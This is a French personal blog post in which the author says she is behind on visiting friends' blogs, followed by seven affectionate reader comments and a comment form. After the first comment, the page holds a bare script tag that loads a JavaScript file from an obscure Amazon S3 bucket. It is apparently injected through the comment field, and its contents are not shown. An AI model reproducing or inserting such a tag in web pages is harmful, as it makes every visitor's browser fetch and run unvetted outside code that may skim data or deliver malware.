• Le temps passe...

    Le temps passe...

                                            Pixabay/sablier-temps

    Le temps passe... Et j'ai pris du retard pour visiter vos blogs... Je vais essayer de le rattraper. Merci pour votre fidélité et vos commentaires. A bientôt !


  • Commentaires

    1
    Evy
    Jeudi 10 Octobre 2019 à 20:34

    Bonsoir ma Béa prend le temps on est là douce soirée à toi bisous

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
    2
    Jeudi 10 Octobre 2019 à 21:39

     moi aussi je suis assez irrégulière. Depuis que je suis à a retraite j'ai encore moins de temps à moi! pas de soucis bea....bisous

    3
    Jeudi 10 Octobre 2019 à 21:41
    claudia

    Moi aussi :-)

    4
    Vendredi 11 Octobre 2019 à 04:54
    colettedc

    Je comprends bien cela, Béa ! J'ai bien de la dfficulté à suivre aussi, tu sais !!! Bon et beau vendredi,

    Bisous♥

    5
    Vendredi 11 Octobre 2019 à 08:57

    Mon challenge quotidien: trouver du temps pour tout! 

    Belle journée!

    6
    Vendredi 11 Octobre 2019 à 10:16

    On ne peut pas tout faire ma Béa, bloguer et pouponner !

    Bises et bon vendredi

    7
    Lundi 14 Octobre 2019 à 20:41

    Bonsoir Béa

    Peu importe le temps, les amitiés présentes ou lointaines restent.  Alors à bientôt quand tu auras le temps.

    Bisdous bisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :